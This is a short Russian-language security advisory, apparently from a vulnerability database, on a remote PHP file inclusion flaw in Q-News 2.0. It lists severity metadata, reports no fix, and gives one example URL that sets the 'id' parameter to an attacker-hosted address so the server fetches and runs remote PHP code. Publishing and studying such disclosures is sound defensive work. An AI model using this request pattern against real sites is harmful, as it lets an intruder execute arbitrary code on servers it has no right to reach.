PHP инклюдинг в Q-News

Дата публикации:
29.11.2005
Всего просмотров:
2283
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Q-News 2.x
Уязвимые версии: Q-News 2.0, возможно белее ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Уязвимость обнаружена при обработке входных данных в параметре "id" сценария "q-news.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/path_to_qnews/q-news.php?id=http://[attacker_url]

URL производителя: sourceforge.net/projects/q-news/

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: Remote file include in Q-News

или введите имя

CAPTCHA